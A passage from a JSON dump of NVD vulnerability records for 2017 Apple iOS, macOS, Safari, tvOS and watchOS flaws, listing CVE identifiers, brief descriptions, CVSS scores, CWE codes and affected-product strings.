"2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2394", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2394"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2394", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2394", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:43", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"FontParser\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2406", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2406"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2406", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2406", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:48:27", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves nghttp2 before 1.17.0 in the \"HTTPProtocol\" component. It allows remote HTTP/2 servers to have an unspecified impact via unknown vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2428", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2428"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2428", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2428", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:41", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"CoreText\" component. It allows remote attackers to cause a denial of service (resource consumption) via a crafted text message.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2461", "cwe": ["CWE-20", "CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2461"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2461", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:02", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. A buffer overflow allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2482", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2482"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2482", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2482", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:45:24", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2367", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2367"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2367", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:33", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Keyboards\" component. A buffer overflow allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2458", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2458"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2458", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2458", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:24", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2454", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2454"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2454", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2454", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2460", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2460"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2460", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2460", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:28", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2479", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479"], "modified": "2019-03-19T13:40:00", "cpe": [], "id": "CVE-2017-2479", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2479", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T15:48:44", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"CoreText\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2435", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2435"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2435", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2435", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:03", "description": "Use after free vulnerability in the String.replace method JavaScriptCore in Apple Safari in iOS before 10.3 allows remote attackers to execute arbitrary code via a crafted web page, or a crafted file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-27T20:29:00", "type": "cve", "title": "CVE-2017-2491", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2491"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1"], "id": "CVE-2017-2491", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2491", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:52", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2466", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2466"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2466", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2466", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:50:09", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2473", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2473"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2473", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2473", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:31", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2481", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 